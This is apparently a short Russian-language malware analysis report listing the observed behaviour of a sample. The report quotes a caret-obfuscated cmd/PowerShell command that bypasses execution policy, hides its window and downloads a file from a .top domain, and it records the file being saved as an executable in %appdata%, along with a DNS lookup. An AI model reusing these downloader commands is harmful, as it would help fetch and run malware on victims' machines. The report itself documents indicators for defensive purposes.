Техническая информация
- http://www.doorasope.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "P^O^W^er^S^he^lL.eX^e^ -^EXEC^ut^i^O^NPOL^i^cY BypaS^S ^-Nop^ROFIle -WiNDO^wstYLe ^hid^DeN (^new^-o^B^J^EcT S^YsteM^.^n^eT^.^w^eBC^L^IE^N^t).D^Own^l^oa^DFiL^E^(^'http://www.doorasope....
- DNS ASK do###sope.top
- '<SYSTEM32>\cmd.exe' /c "P^O^W^er^S^he^lL.eX^e^ -^EXEC^ut^i^O^NPOL^i^cY BypaS^S ^-Nop^ROFIle -WiNDO^wstYLe ^hid^DeN (^new^-o^B^J^EcT S^YsteM^.^n^eT^.^w^eBC^L^IE^N^t).D^Own^l^oa^DFiL^E^(^'http://www.doorasope....' (со скрытым окном)